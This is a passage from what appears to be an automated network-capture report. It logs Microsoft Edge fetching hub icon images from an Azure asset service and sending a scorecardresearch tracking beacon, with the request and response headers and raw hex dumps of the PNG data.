                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    82192.168.2.74986313.107.246.404438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:47 UTC438OUTGET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Length: 1579
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBDCB5DE99522A
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: a124cbd3-e01e-000b-047f-407073000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f7845968swgbqhC1EWRmnb40000000wug000000005032
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC1579INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    83192.168.2.74986413.107.246.404438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC431OUTGET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Length: 1966
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBDCB5EC122A94
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 0bea2c01-401e-0042-507f-404313000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f78459688l8rvhC1EWRtzr000000009a0000000002d3h
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC1966INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNnt*w<T:A*-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    84192.168.2.74982218.165.220.1104438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC925OUTGET /b?rn=1732700967945&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39EBC277A9596CA639AAD733A8706D90&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                    Location: /b2?rn=1732700967945&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39EBC277A9596CA639AAD733A8706D90&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                                    set-cookie: UID=1BBb0735b69c9f65be6a9b11732694808; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                                    set-cookie: XID=1BBb0735b69c9f65be6a9b11732694808; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                    Via: 1.1 9b06261b360f2fc15a3d94db42c0a168.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: Yzid0AOwU3LVz5QyoaP5OWiBj4GsFMwqPgPgSmRYfjqU5dNZ-W3Z9g==


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    85192.168.2.74986213.107.246.404438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC433OUTGET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Length: 1751
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBCEA8D5AACC85
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: b9c5c0e5-901e-0069-057f-4037ab000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f784596886s2bhC1EWR743w0000000wp0000000007gkq
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC1751INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    86192.168.2.74986513.107.246.404438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC433OUTGET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Length: 1427
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBDCB5EF021F8E
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 843d88b3-801e-005f-1a7f-409af9000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f78459684bddphC1EWRbht40000000wc0000000006cu3
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC1427INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    87192.168.2.74986113.107.246.404438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC430OUTGET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Length: 2008
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBC9B5C0C17219
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 204c33f4-801e-0054-0391-3f828d000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f7845968psccphC1EWRuz9s0000000wyg0000000037ht
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC2008INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    88192.168.2.74986613.107.246.404438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC422OUTGET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Length: 2229
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBD59359A9E77B
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 91faf48f-601e-005e-307f-409b04000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f7845968swgbqhC1EWRmnb40000000ws0000000009gbt
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC2229INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8
